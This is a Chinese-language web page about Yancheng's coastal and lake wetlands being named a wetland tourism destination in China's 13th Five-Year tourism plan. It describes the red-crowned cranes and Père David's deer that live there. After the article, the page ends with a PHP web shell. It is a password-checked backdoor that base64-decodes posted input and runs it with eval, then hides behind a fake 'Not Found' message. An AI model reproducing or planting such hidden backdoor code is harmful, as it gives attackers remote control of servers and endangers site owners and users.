湿地之窗

首页 > 科研保护 > 湿地之窗 >

    盐城湿地入选国家旅游规划

           日前,在国务院公布的《“十三五”旅游业发展规划》中,“江苏盐城湿地”入选特色旅游目的地之湿地旅游目的地。这是盐城市旅游首次入选国家旅游规划。
      盐城湿地旅游列入国家规划,这既是国家层面对盐城市发展生态湿地旅游的认可和希望,也是对盐城市多年来加快推进生态旅游的充分肯定,为盐城市今后加快生态湿地旅游发展,提供了良好的规划依据和突破机遇。
      盐城坐拥世界级品质的湿地生态旅游资源,以“东方湿地,水绿盐城”而闻名。盐城东部沿海湿地是太平洋西海岸、亚洲大陆边缘面积最大、原始生态保持最完好的海岸型湿地,世界野生丹顶鹤和麋鹿种群数的60%和25%生活在这里,被列入世界重点湿地保护区。盐城大纵湖、九龙口、马家荡等湖泊水域面积近百平方公里,为典型的湖荡湿地,被誉为“金滩银荡”。盐城也是联合国人与自然生物圈网络成员,被列入联合国“世界重要湿地名录”、“联合国人与生物圈保护网络”。
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>